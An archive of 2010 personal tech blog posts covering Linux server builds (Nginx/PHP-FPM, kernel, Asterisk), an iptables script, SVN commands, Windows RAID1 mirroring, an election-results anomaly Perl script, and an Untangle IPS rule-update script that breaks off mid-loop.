Canonical Ubuntu 10.10 on Amazon EC2 + Nginx + PHP-FPM
12/31/2010 03:46:00 AM
This procedure was performed on a 32bit OS (Micro instance) but may also work with little or no modification. Drop me a note if you get this to work on a 64bit without modification.
1. First you need to install pre-reqs
apt-get install gcc autoconf libevent-dev libxml2-dev libssl-dev libpcre++-dev libbz2-dev libcurl4-openssl-dev libgmp3-dev libmysql++-dev libmcrypt-dev
2. Add the nginx user
useradd nginx
3. Compile and install PHP
mkdir /root/files && mkdir /etc/php.d && cd /root/files wget http://sg2.php.net/get/php-5.3.4.tar.gz/from/sg.php.net/mirror tar xvfz php-5.3.4.tar.gz && cd php-5.3.4 ./configure --host=i686-ubuntu-linux-gnu --build=i686-ubuntu-linux-gnu --target=i386-ubuntu-linux --program-prefix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --sysconfdir=/etc --datadir=/usr/share --includedir=/usr/include --libdir=/usr/lib --libexecdir=/usr/libexec --localstatedir=/var --sharedstatedir=/usr/com --mandir=/usr/share/man --infodir=/usr/share/info --cache-file=../config.cache --with-libdir=lib --with-config-file-path=/etc --with-config-file-scan-dir=/etc/php.d --disable-debug --disable-rpath --without-pear --without-gdbm --without-gd --without-pspell --without-unixODBC --without-sqlite --without-sqlite3 --with-libxml-dir=/usr --with-pic --with-bz2 --with-curl --with-exec-dir=/usr/bin --with-freetype-dir=/usr --with-png-dir=/usr --with-gettext --with-gmp --with-iconv --with-jpeg-dir=/usr --with-openssl --with-pcre-regex=/usr --with-zlib --with-layout=GNU --with-mysql --enable-gd-native-ttf --enable-exif --enable-magic-quotes --enable-sockets --enable-sysvsem --enable-sysvshm --enable-sysvmsg --enable-wddx --enable-ucd-snmp-hack --enable-calendar --enable-xml --enable-mbstring --enable-inline-optimization --disable-dom --disable-dba --disable-pdo --disable-xmlreader --disable-xmlwriter --disable-json --enable-fpm --with-fpm-user=nginx --with-fpm-group=nginx make all install cp /root/files/php-5.3.4/php.ini-production /etc/php.ini && mv /etc/php-fpm.conf.default /etc/php-fpm.conf && cp /root/files/php-5.3.4/sapi/fpm/init.d.php-fpm /etc/init.d/php-fpm chmod +x /etc/init.d/php-fpm
4. PHP-FPM configuration
cat << END >> /etc/php-fpm.conf pm.start_servers = 20 pm.min_spare_servers = 5 pm.max_spare_servers = 35 END
5. Compile and install Nginx
cd /root/files && wget http://nginx.org/download/nginx-0.8.53.tar.gz tar xvfz nginx-0.8.53.tar.gz mkdir /etc/nginx/ && mkdir /var/log/nginx/ && cd nginx-0.8.53 ./configure --sbin-path=/usr/sbin --without-mail_pop3_module --without-mail_imap_module --without-mail_smtp_module --with-http_stub_status_module --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --pid-path=/var/run/nginx.pid --user=nginx --group=nginx --http-log-path=/var/log/nginx/access.log make && make install
6. Fast-CGI Configuration
cat << END >> /etc/nginx/fastcgi_params fastcgi_connect_timeout; fastcgi_send_timeout 180; fastcgi_read_timeout 180; fastcgi_buffer_size 128k; fastcgi_buffers 4 256k; fastcgi_busy_buffers_size 256k; fastcgi_temp_file_write_size 256k; fastcgi_intercept_errors on; END
7. Get Nginx init script from http://wiki.nginx.org/Nginx-init-ubuntu. Make the following changes:
DAEMON=/usr/sbin/nginx NGINX_CONF_FILE="/etc/nginx/nginx.conf
8. Make Nginx and PHP-FPM run on start-up
update-rc.d nginx start 99 2 3 4 5 . stop 80 0 1 6 . update-rc.d php-fpm start 99 2 3 4 5 . stop 80 0 1 6 .
9. Setup log rotate
cat << END > /etc/logrotate.d/nginx
/var/log/nginx/*.log {
weekly
missingok
rotate 52
compress
delaycompress
notifempty
create 640 root adm
sharedscripts
postrotate
[ ! -f /var/run/nginx.pid ] || kill -USR1 `cat /var/run/nginx.pid`
endscript
}
END
10. Installing additional modules. If you want to install additional PHP modules for your applications, it's easy. All you have to do is go to your PHP source directory, compile the module and copy the compiled module to the PHP modules directory which in this case is /usr/lib/20090626. It looks something like this:
cd /root/files/php-5.3.4/ext/json phpize ./configure && make cp modules/json.so /usr/lib/20090626/ /etc/init.d/php-fpm restart
Connecting to MySQL from C -- Sample Code
9/16/2010 11:26:00 PM
I got curious how to connect to a MySQL server from C. This code is a rip-off from another blog but made minor modifications to get rid of compile warnings. My test system is Snow Leopard 10.6.3.
Compile by:
gcc -o test $(mysql_config --cflags) test.c $(mysql_config --libs)
Code
Election 2010 Anomaly Watcher - revised
5/19/2010 07:48:00 AM
I modified the original script to include another check. So the script now checks for two things. First, it checks for candidates having a high percentage of votes and second, it checks for low percentage of votes in a position as compared to the total of people you actually voted. See example below:
In the figure above, the number of people who actually voted for a president is 27 but the total number of people who voted in that CP is 189. What happened to the other 162? On that same page other positions like Governor/Vice-governor looked normal.
So there is my modified script:
Howto Recompile the Kernel - UBUNTU Way
5/18/2010 03:57:00 PM
First, why should you upgrade or change your kernel? Here are just some of the reasons:
- You need a feature that only the newer kernel supports
- You came across a bug which is fixed in the newer version
- You have a device driver that needs kernel recompile either as a module or compiled with the kernel
- You are bored
As for me, I got bored.
Overview of the process:
- Update apt sources
- Install the necessary pre-requisites
- Get the kernel source
- Compile
- Install the kernel and modules
- Reboot with the new kernel
Here are are the steps:
1. Update your APT sources
apt-get update
2. In Ubuntu 10.04, /bin/sh is linked to /bin/dash. This may be a problem during compilation. Change the link from /bin/dash to /bin/bash
rm -f /bin/sh ln -s /bin/bash /bin/sh
3. Install pre-requisites
apt-get install kernel-package libncurses5-dev fakeroot wget bzip2
4.Get the kernel source
cd /usr/src/
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.34.tar.bz2
tar xjf linux-2.6.34.tar.bz2
ln -s linux-2.6.34 linux
cd linux
5. Copy the config of the running kernel as a basis configuration for the new kernel. It's usually a good idea to do this.
cp /boot/config-`uname -r` ./.config
6. Now we are ready to select kernel options. This is also the time to select weather you want a driver compiled as module, with the kernel or not to include at all. You have to options in doing this -- using a nice GTK menu or using the console (curses based). The latter is usually the way to go but if you want the former make sure you install libgtk2.0-dev and libglade2-dev first. For now, we will go with the console (curses)
make menuconfig
or
make gconfig
This will bring up the kernel configuration menu. Go to "Load Alternate Configuration File" and choose ".config" as the configuration file. This will load the configuration for the currently running kernel. Browse through the options and make your changes. When you are finished select "Exit" and choose YES to save.
7. We are now ready to compile the kernel. This process will take a considerable amount of time depending on the speed of your machine and the number of modules you choose to compile.
make-kpkg clean
fakeroot make-kpkg --initrd --append-to-version=-custom kernel_image kernel_headers
You can substitute anything for --append-to-version paramater as long as it starts with a "-". This string may be your version or revision number or simply just a tag.
8. When compilation is done, we can now install the new kernel and modules
cd /usr/src/ [email protected]:/usr/src# ls -la total 106128 drwxrwsr-x 5 root src 4096 2010-05-18 14:50 . drwxr-xr-x 11 root root 4096 2010-05-18 09:29 .. lrwxrwxrwx 1 root src 12 2010-05-18 09:33 linux -> linux-2.6.34 drwxr-xr-x 25 root root 4096 2010-05-18 14:48 linux-2.6.34 -rw-r--r-- 1 root src 67633622 2010-05-17 05:37 linux-2.6.34.tar.bz2 drwxr-xr-x 24 root root 4096 2010-02-10 01:07 linux-headers-2.6.32-12 drwxr-xr-x 7 root root 4096 2010-02-10 01:07 linux-headers-2.6.32-12-generic -rw-r--r-- 1 root src 6675822 2010-05-18 14:50 linux-headers-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb -rw-r--r-- 1 root src 34340580 2010-05-18 14:47 linux-image-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb
dpkg -i linux-image-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb dpkg -i linux-headers-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb
9. Reboot. Enjoy!
Channel Vision Telephone Lightning Protector
5/14/2010 02:07:00 PM
I recently got eight units of Channel Vision Telephone Lightning Protector (model C-0410).Channel Vision C-0410 surge protection (stopper) module is compatible with all Loop start Consumer Premise equipment.
PRODUCT FEATURES:
- Complies with UL 1459 and UL 1950 power cross requirements
- Passes FCC Part 68 Type A and Type B lighting tests operationally
- Provides un-balanced line over voltage and over current protection
- Automatically resets once surge condition has cleared restoring the phone line
- 4 lines in
- 4 lines out
The device is pretty interesting. Its input interface is a 110 block where you can use any standard 110 punch tool. For the output interface, you can either use the 110 block or the RJ45 interface. The device uses thermal fuses. It disconnects the line during a power surge and automatically reconnects when the unit cools down, cool huh! :)
We imported it from the US of A, anyone know where I can get these locally? Product page can be found here.
Election 2010 Anomaly Watcher
5/13/2010 07:24:00 PM
While the 2010 Election was generally peaceful and the results came in fast, it doesn't mean the results were correct. I am referring to:
http://electionresults.ibanangayon.ph/res_reg5808114.html
http://electionresults.ibanangayon.ph/res_reg5808113.html
http://electionresults.ibanangayon.ph/res_reg5808112.html
http://electionresults.ibanangayon.ph/res_reg5808111.html
http://electionresults.ibanangayon.ph/res_reg5808110.html
These results are impossible and could not possibly happen. This is just for 5 clustered precincts. The effect of this mistake for a hundred CP is unimaginable lest a thousand. So i whipped out a small script to find other precincts where results are "questionable". The script basically checks for the "percentage" of votes garnered for a particular candidate. If it goes beyond the pre-configured threshold, it flags the file and makes a log.
Also, you need a local mirror of http://electionresults.ibanangayon.ph which can be easily accomplished with:
wget --mirror –w 2 –-convert-links http://electionresults.ibanangayon.ph
If you are on PLDT, use http://124.105.166.195/, for GlobeTelecom, use http://222.127.18.105/
Remember to edit $SearchFor, $mirror and $threshold to suit for needs.
#!/usr/bin/perl # # Election 2010 Anomaly Watcher # John Homer H Alvero # [email protected] # May 13, 2010 use HTML::TableExtract; use LWP::Simple; # SearchFor: # Possible Values: # # 1 = President # 3 = Vice President # 5 = Senator # 7 = Party List my $SearchFor = 1; my $mirror = "/var/www/election/electionresults.ibanangayon.ph/"; my $threshold = 90; &check_folders($mirror); # SUB(s) sub check_folders { my($dir) = @_; local (*FOLDER); my(@subfiles, $file, $specfile); opendir(FOLDER, $dir) or die "cannot open $dir"; @subfiles = readdir(FOLDER); closedir(FOLDER); foreach $file (@subfiles) { $specfile = $dir . $file; if (-f $specfile && $file =~ m/\S+\.html/) { my $page = get("file://" . $specfile) or die $!; $te = HTML::TableExtract->new( headers => [qw(Candidate Votes Percentage)], depth => 0, count => $SearchFor ); $te->parse($page); foreach $ts ($te->tables) { foreach $row ($ts->rows) { chop( $votes = @$row[2]); if ($votes > $threshold) { print "Found filename " . $specfile . " name:" . @$row[0] . " at $votes%" . "\n"; } } } #Check for Subdirectories (not really needed) } elsif (-d $specfile) { if ($specfile !~ m/\S+\.$/) { &check_folders($specfile . "\/"); } }#if }#for }#sub
UPDATE: (May 17, 2010)
I ran the script on my local mirror and here is what I found. (note that my local is not complete yet and scanning is not yet over)
[email protected]:/home/john/ibangangayon/124.105.166.195# /root/table.pl Found filename res_reg3629006.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg3615004.html name:ACOSTA, Vetellano S. at 100.00% Found filename res_reg3636022.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg5512002.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg313022.html name:AQUINO, Benigno Simeon III C. at 99.20% Found filename res_reg3516000.html name:AQUINO, Benigno Simeon III C. at 98.20% Found filename res_reg3807028.html name:VILLAR, Manuel Jr B. at 99.09% Found filename res_reg3826010.html name:VILLAR, Manuel Jr B. at 99.49% Found filename res_reg6615003.html name:VILLAR, Manuel Jr B. at 98.15% Found filename res_reg3601016.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg705032.html name:AQUINO, Benigno Simeon III C. at 98.55% Found filename res_reg3812027.html name:AQUINO, Benigno Simeon III C. at 99.64% Found filename res_reg6610016.html name:TEODORO, Gilberto Jr. C. at 98.01% Found filename res_reg6606006.html name:AQUINO, Benigno Simeon III C. at 98.35% Found filename res_reg3807036.html name:VILLAR, Manuel Jr B. at 98.84% Found filename res_reg3835015.html name:VILLAR, Manuel Jr B. at 98.18% Found filename res_reg302019.html name:AQUINO, Benigno Simeon III C. at 98.88% Found filename res_reg3812029.html name:AQUINO, Benigno Simeon III C. at 99.67% Found filename res_reg705034.html name:AQUINO, Benigno Simeon III C. at 98.79% Found filename res_reg3826008.html name:VILLAR, Manuel Jr B. at 98.97% Found filename res_reg3803017.html name:TEODORO, Gilberto Jr. C. at 98.32% Found filename res_reg3803013.html name:TEODORO, Gilberto Jr. C. at 98.92% Found filename res_reg3807018.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg3835014.html name:VILLAR, Manuel Jr B. at 98.73% Found filename res_reg3832009.html name:TEODORO, Gilberto Jr. C. at 99.24% Found filename res_reg3812064.html name:AQUINO, Benigno Simeon III C. at 99.29% Found filename res_reg3617010.html name:VILLAR, Manuel Jr B. at 99.34% Found filename res_reg3807023.html name:TEODORO, Gilberto Jr. C. at 99.57% Found filename res_reg3626009.html name:AQUINO, Benigno Simeon III C. at 98.84% Found filename res_reg702017.html name:AQUINO, Benigno Simeon III C. at 98.02% Found filename res_reg3832010.html name:TEODORO, Gilberto Jr. C. at 99.37% Found filename res_reg3812047.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg6615012.html name:VILLAR, Manuel Jr B. at 99.19% Found filename res_reg3812050.html name:AQUINO, Benigno Simeon III C. at 99.87% Found filename res_reg3629002.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg6607015.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg6610014.html name:TEODORO, Gilberto Jr. C. at 98.87% Found filename res_reg4406026.html name:TEODORO, Gilberto Jr. C. at 100.00% Found filename res_reg4406026.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg4406026.html name:PERLAS, Jesus Nicanor P. at 100.00% Found filename res_reg4406026.html name:DE LOS REYES, John Carlos G. at 100.00% Found filename res_reg4406026.html name:ESTRADA EJERCITO, Joseph M. at 100.00% Found filename res_reg4406026.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg4406026.html name:VILLANUEVA, Eduardo C. at 100.00% Found filename res_reg4406026.html name:MADRIGAL, Jamby A. at 100.00% Found filename res_reg4406026.html name:ACOSTA, Vetellano S. at 100.00% Found filename res_reg4406026.html name:GORDON, Richard J. at 100.00% Found filename res_reg112002.html name:TEODORO, Gilberto Jr. C. at 98.33% Found filename res_reg6606002.html name:AQUINO, Benigno Simeon III C. at 98.58% Found filename res_reg3832011.html name:TEODORO, Gilberto Jr. C. at 99.61% Found filename res_reg3629018.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg6610010.html name:TEODORO, Gilberto Jr. C. at 99.37% Found filename res_reg5535035.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg5535035.html name:VILLANUEVA, Eduardo C. at 100.00% Found filename res_reg5535035.html name:ACOSTA, Vetellano S. at 100.00% Found filename res_reg5535035.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg5535035.html name:DE LOS REYES, John Carlos G. at 100.00% Found filename res_reg5535035.html name:ESTRADA EJERCITO, Joseph M. at 100.00% Found filename res_reg5535035.html name:GORDON, Richard J. at 100.00% Found filename res_reg5535035.html name:MADRIGAL, Jamby A. at 100.00% Found filename res_reg5535035.html name:PERLAS, Jesus Nicanor P. at 100.00% Found filename res_reg5535035.html name:TEODORO, Gilberto Jr. C. at 100.00% Found filename res_reg3812025.html name:AQUINO, Benigno Simeon III C. at 99.62% Found filename res_reg7001014.html name:TEODORO, Gilberto Jr. C. at 99.70% Found filename res_reg3812069.html name:AQUINO, Benigno Simeon III C. at 99.58% Found filename res_reg1529053.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg1529053.html name:VILLANUEVA, Eduardo C. at 100.00% Found filename res_reg1529053.html name:PERLAS, Jesus Nicanor P. at 100.00% Found filename res_reg1529053.html name:TEODORO, Gilberto Jr. C. at 100.00% Found filename res_reg1529053.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg1529053.html name:MADRIGAL, Jamby A. at 100.00% Found filename res_reg1529053.html name:ACOSTA, Vetellano S. at 100.00% Found filename res_reg1529053.html name:GORDON, Richard J. at 100.00% Found filename res_reg1529053.html name:DE LOS REYES, John Carlos G. at 100.00% Found filename res_reg1529053.html name:ESTRADA EJERCITO, Joseph M. at 100.00% Found filename res_reg3818005.html name:AQUINO, Benigno Simeon III C. at 98.55% Found filename res_reg3637008.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg3833002.html name:AQUINO, Benigno Simeon III C. at 99.59% Found filename res_reg3807022.html name:TEODORO, Gilberto Jr. C. at 99.67% Found filename res_reg3802024.html name:AQUINO, Benigno Simeon III C. at 99.37% Found filename res_reg3836018.html name:ACOSTA, Vetellano S. at 100.00% Found filename res_reg3635006.html name:TEODORO, Gilberto Jr. C. at 98.31% Found filename res_reg3803011.html name:TEODORO, Gilberto Jr. C. at 98.98% Found filename res_reg3807007.html name:VILLAR, Manuel Jr B. at 98.72% Found filename res_reg3835017.html name:VILLAR, Manuel Jr B. at 99.11% Found filename res_reg6610001.html name:TEODORO, Gilberto Jr. C. at 99.59% Found filename res_reg3114084.html name:BINAY, Jejomar C. at 100.00% Found filename res_reg3114084.html name:CHIPECO, Dominador Jr F. at 100.00% Found filename res_reg3114084.html name:FERNANDO, Bayani F. at 100.00% Found filename res_reg3114084.html name:LEGARDA, Loren B. at 100.00% Found filename res_reg3114084.html name:MANZANO, Eduardo B. at 100.00% Found filename res_reg3114084.html name:ROXAS, Manuel A. at 100.00% Found filename res_reg3114084.html name:SONZA, Jose Y. at 100.00% Found filename res_reg3114084.html name:YASAY, Perfecto R. at 100.00% Found filename res_reg3812057.html name:AQUINO, Benigno Simeon III C. at 98.96% Found filename res_reg3812014.html name:AQUINO, Benigno Simeon III C. at 98.59% Found filename res_reg3812019.html name:AQUINO, Benigno Simeon III C. at 98.92% Found filename res_reg6604024.html name:VILLAR, Manuel Jr B. at 98.72% Found filename res_reg5527039.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg5527039.html name:VILLANUEVA, Eduardo C. at 100.00% Found filename res_reg5527039.html name:DE LOS REYES, John Carlos G. at 100.00% Found filename res_reg5527039.html name:ESTRADA EJERCITO, Joseph M. at 100.00% Found filename res_reg5527039.html name:TEODORO, Gilberto Jr. C. at 100.00% Found filename res_reg5527039.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg5527039.html name:PERLAS, Jesus Nicanor P. at 100.00% Found filename res_reg5527039.html name:MADRIGAL, Jamby A. at 100.00% Found filename res_reg5527039.html name:ACOSTA, Vetellano S. at 100.00% Found filename res_reg5527039.html name:GORDON, Richard J. at 100.00% Found filename res_reg3836013.html name:VILLAR, Manuel Jr B. at 100.00% Found filename res_reg3817021.html name:ESTRADA EJERCITO, Joseph M. at 98.65% Found filename res_reg705005.html name:AQUINO, Benigno Simeon III C. at 98.51% Found filename res_reg3637017.html name:AQUINO, Benigno Simeon III C. at 100.00% Found filename res_reg3601017.html name:MADRIGAL, Jamby A. at 300.00% Found filename res_reg3601017.html name:ACOSTA, Vetellano S. at 300.00% Found filename res_reg3601017.html name:GORDON, Richard J. at 300.00% Found filename res_reg3601017.html name:DE LOS REYES, John Carlos G. at 300.00% Found filename res_reg3601017.html name:ESTRADA EJERCITO, Joseph M. at 300.00% Found filename res_reg3601017.html name:VILLAR, Manuel Jr B. at 300.00% Found filename res_reg3601017.html name:TEODORO, Gilberto Jr. C. at 300.00% Found filename res_reg3601017.html name:PERLAS, Jesus Nicanor P. at 300.00% Found filename res_reg3601017.html name:AQUINO, Benigno Simeon III C. at 300.00% Found filename res_reg3601017.html name:VILLANUEVA, Eduardo C. at 300.00%
Booting with OCZ Vertex 60GB SSD
3/18/2010 03:49:00 PM
I recently got i nice piece of hardware and I love it. It is intended for a VoIP asterisk server but I took the liberty of testing it first with common operating system (Windows XP, Ubuntu). Here is what I got.
Beginning subversion - svn for the n00b
3/18/2010 11:43:00 AM
I compiled a small set of commands for the svn newbie like me. I will update this post whenever needed as I am still learning it myself.
# Create a repository svnadmin create d:\repos\dbf2009 # Import initial files to repository svn import -m "Initial Import" DBF2009 svn://ip.address/dbf2009 --username harry # Checkout svn co svn://ip/reponame #checkout from same machine svn co file:///e:/repos/dbf2009 # Update working copy (local copy) svn update # See overview of changed files (comparison from .svn) svn status # See defailed info of cahnged files (comparison from server) svn status -u -v # Commit changes to svn server svn commit -m "testing lang" # See defailed diff svn diff # Schedule addition of a file or directory svn add# Rename a repository # There is no rename command, create a new repo, create a dump file from the old repo, # load the dump file to the new repo. Don't forget to fix permissions in config directory svnadmin create /path/to/new/repository/ svnadmin dump /the/path/to/old/repository/ > old-repo.dump svnadmin load /the/path/to/new/repository/ < old-repo.dump
Basic IPTABLES Firewall Script
3/09/2010 01:56:00 PM
Here is a basic firewall script for servers running HTTP and FTP. The script is commented so its easy to put in additional rules. Also note that you have to put your own DNS server in $dnsIP variable. Additional ports (tcp or udp) to be opened may placed in allow_tcp and allow_udp variables. Before using the script make sure to do chmod +x iptables.sh first.
Usage:
./iptables.sh start
or
./iptables.sh stop
and now the script:
#!/bin/sh # John Homer H Alvero # [email protected] # March 9, 2010 set -e iptables="/sbin/iptables" modprobe="/sbin/modprobe" dnsIP="8.8.8.8" #IP Address of DNS server allow_tcp="80 22" #This will allow SSH and HTTP, add more ports as needed allow_udp="" load () { echo "Loading Kernel modules" $modprobe ip_tables $modprobe ip_conntrack $modprobe iptable_filter $modprobe ipt_state echo "Kernel modules loaded." echo "Loading rules" #Set Default policy $iptables -P FORWARD DROP $iptables -P INPUT DROP $iptables -P OUTPUT DROP #Allow RELATED and ESTABLISHED connections $iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #Allow traffic to localhost $iptables -A INPUT -s 127.0.0.1 -j ACCEPT #Allow DNS Queries to DNS Server $iptables -A INPUT -p udp -s $dnsIP/32 --source-port 53 -d 0/0 --destination-port 1024:65535 -j ACCEPT $iptables -A OUTPUT -p udp --destination $dnsIP --dport 53 -j ACCEPT if [ -n "$allow_tcp" ]; then for i in $allow_tcp do $iptables -A INPUT -p tcp -m tcp --destination-port $i -j ACCEPT done fi if [ -n "$allow_udp" ]; then for i in $allow_udp do $iptables -A INPUT -p udp --destination-port $i -j ACCEPT done fi #Add additional rules here. echo "Rules loaded." } flush () { echo "Flushing rules..." $iptables -P FORWARD ACCEPT $iptables -P OUTPUT ACCEPT $iptables -P INPUT ACCEPT $iptables -F echo "Rules flushed." } case "$1" in start|restart) flush load ;; stop) flush ;; *) echo "usage: start|stop|restart" ;; esac exit 0
Ubuntu 9.10 + Asterisk + Asterisk-GUI Installation
2/25/2010 11:22:00 AM
Software used:
- Ubuntu 9.10 Karmic
- Asterisk 1.4.30-rc2
- libpri 1.4.10.2
- dahdi drivers/tools 2.2.1
- asterisk-gui 2.0
I settled for a 1.4 asterisk instead of 1.6 because I was having issues making asterisk-gui work with asterisk.
Now for the steps:
1. Install necessary prerequisites
sudo apt-get install linux-headers-$(uname -r) build-essential autoconf automake autotools-dev bison flex libncurses5-dev libssl-dev libtool subversion svn-buildpackage libxml2-dev
and create working folder
sudo mkdir /usr/src/asterisk
sudo cd /usr/src/asterisk
2. Download necessary files
sudo wget http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-1.4.30-rc2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/libpri/releases/libpri-1.4.10.2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/dahdi-linux-complete/releases/dahdi-linux-complete-2.2.1+2.2.1.tar.gz
sudo svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0 asterisk-gui
3. Unpack the packages
sudo tar -xvf asterisk-1.4.30-rc2.tar.gz
sudo tar -xvf libpri-1.4.10.2.tar.gz
sudo tar -xvf dahdi-linux-complete-2.2.1+2.2.1.tar.gz
4. Install libpri
cd libpri-1.4.10.2
sudo make clean
sudo make
sudo make install
5. Install dahdi-linux
cd ..
cd dahdi-linux-complete-2.2.1+2.2.1
sudo make
sudo make install
6. Asterisk
cd ..
cd asterisk-1.4.30-rc2
sudo make clean
sudo ./configure
sudo make install
sudo make samples
sudo make config
7. Now for the web interface, Asterisk-GUI
cd ../asterisk-gui
sudo make clean
sudo ./configure
sudo make
sudo make install
8. Before you can finally use the web interface, you need to make some minor configuration.
sudo vim /etc/asterisk/http.conf
and make the following changes:
[general]
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0 or your IP Server
bindport=8088
9. Add the manager account
sudo vi /etc/asterisk/manager.conf
and make the following changes
[general]
enabled = yes
webenabled = yes
port = 5038
bindaddr = 0.0.0.0 or your IP Server
at the bottom of the file, add the following config:
[admin]
secret = yourpassword
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,config
10. Open the web interface at http://192.168.0.1:8088/asterisk/static/config/index.html
Screenshots:
System Status
Add/Edit User
Windows 2003 RAID1 mini HOW TO (recovering from a failed drive) - Part 2
2/22/2010 11:12:00 AM
Recovering from a failed drive is simple. You just have to remove the mirror and add a mirror to the new drive.
Recovering from a failed secondary drive
1. In Disk Management, right click your first partition and choose Remove Mirror...
2. Do the same to other partitions.
3. Now, with the new drive in place, build the new mirror as described in the first part of this how to.
Recovering from a failed primary drive
You need to get your hands dirty a bit.
1. Open up your server's casing and remove the failed drive (primary disk)
2. Move the second drive to the first SATA/IDE port (where the primary drive was previously connected)
3. Start up the server, boot normally. Disk Management will look something like this:
Notice the Missing status on the mirror drive. We removed the mirror and moved it to become the primary drive. Thus, the missing status.
4. Right click on the first partition in Disk 0 and choose Remove Mirror...
Do the same to other partitions.
5. The following prompt may appear because the mirror drive is missing. It is safe to just click OK.
6. Disk Management should look something like this.
7. You can now proceed to Adding a mirror as described in the first part of this how to.
Windows 2003 RAID1 mini HOW TO - Part 1
2/19/2010 09:50:00 AM
This step-by-step article describes how to mirror the system and boot partition in Windows Server 2003. This scenario is based on the assumption that the system and boot files are located on disk 0 and that disk 1 is unallocated space.
First some definition:
RAID 1 mirroring is an arrangement of hard disks that creates an exact copy (or mirror) of a set of data on two or more disks. This is useful when read performance or reliability are more important than data storage capacity.
Requirements:
- At least two hard-disk drives; IDE, small computer system interface (SCSI), or mixed architecture is permissible.
- The second drive must be at least the size of the volume on which the operating system boot and system files reside to permit mirroring.
- The Windows Server 2003 system and boot files must reside on the same volume to be mirrored.
Objective:
- To add a mirror to the primary drive for redundancy so that when either of the drive fails, quick recovery can be done.
There are two parts in this process -- Converting your Disks to Dynamic Disks and Adding the Actual Mirror.
Converting to Dynamic Disks
Steps:
1. Right click on My Computer on your desktop and click Manage. Under Storage, click Disk Management.
2. Right click on Disk0 and choose Convert to Dynamic Disk...
3. Tick Disk0 and Disk1 and click OK.
4. Review the disks to be converted, click Convert to proceed.
5. The next menu is a warning that other operating systems installed on any volumes on any disks can no longer start. Make sure that you are not dual booting other operating systems. Click Yes to proceed.
6. Now for the final confirmation. Click Yes to proceed.
7. Click OK when prompted. This will restart your server.
8. At this point, new drivers where installed to support the dynamic disks. You will now be prompted to restart - AGAIN.
9. That completes the process of converting to dynamic disks. You can now proceed to adding actual mirror.
Adding the Mirror
On my primary drive, I have setup pre-setup two partitions. One for the operating system and program files and another for my data. We are going to mirror both.
1. Go to Disk Management as described in the previous process.
2. Right click on the first partition and click Add Mirror..
3. Select the second drive (Disk 1), then click Add Mirror.
4. The partition will now sync to the second drive. Notice that the mirrored partition will now be color coded. It will look something like this.
5. Repeat the same step to the second partition.
When the sync-ing process is done. You now have a RAID 1 system when means, you have 1 parity. Your data is safe even if 1 drive fails.
Part 2 of this mini HOW TO will discuss on how to recover from a failed drive.
References:
Untangle UTM IPS Update Script
2/17/2010 09:30:00 AM
This script will generate an .sql file from emergingthreats.net ready for dumping to Untangle Postgres database. Although this script may not be needed as Untangle will auto-update itself, but for those who want to be cutting-edge, this script is for you. You will have to manually update the table by:
psql -e -f newrules.sql uvm postgres
Now for the script:
#! /bin/bash
# John Homer H Alvero
# Feb 13, 2010
# Change to working directory
cd /root/emergingthreats
RULEFILE='emerging-all.rules'
LIVE="t"
LOGGING="t"
/usr/bin/wget http://www.emergingthreats.net/version.txt
if [ "$?" -ne "0" ]; then
# failed download - abort run
exit
fi
exec < version.txt
read CURRENTVERSION
echo $CURRENTVERSION
exec < oldversion.txt
read OLDVERSION
echo $OLDVERSION
if [ ${CURRENTVERSION} -eq ${OLDVERSION} ]; then
echo "same release available - checking next for updates to exceptions"
rm -f version.txt*
else
echo "new version available"
rm -f $RULEFILE
/usr/bin/wget http://www.emergingthreats.net/rules/$RULEFILE
if [ "$?" -ne "0" ]; then
echo "failed retrieve of new files - exiting"
exit 3
fi
mv version.txt oldversion.txt
rm -f version.txt*
# Process file now
echo "delete from n_ips_rule where Category = 'EmergingThreat';">newrules.sql
RACK=( )
DATA=`psql -c "SELECT settings_id from n_ips_settings;" uvm postgres`
for d in $DATA
do
if [ -z "$(echo "$d" |\
sed 's/[0-9]//g;s/[0-9]//g;s/\.//' \
)" ] ; then
RACK=`echo " $RACK $d" `
fi
done
CUSTOMSID=50000
exec <$RULEFILE
while read RULES
do
CHAR1=`echo $RULES|awk '{print substr($0,1,1)}'`
WORD1=`echo $RULES|awk '{print $1}'`
if [ "$CHAR1" = "#" ]; then
DESCRIPTION=`echo $RULES|awk '{gsub(/\047/,"");print substr($0,1,60)}'`
elif [ "$WORD1" = "alert" ]; then
RULE=`echo -e $RULES|awk '{sub(/alert /,"");gsub(/\047/,"");print}'`
SID=`echo $RULES|awk '{FS=";";;print $(NF-1)}'|awk '{sub(/sid:/,"");sub(/;/,"");print $0}'`
NAME="Name"
CATEGORY="EmergingThreat"
ALERT="f"
SETTINGSID=$CURRENTVERSION
for r in $RACK
do
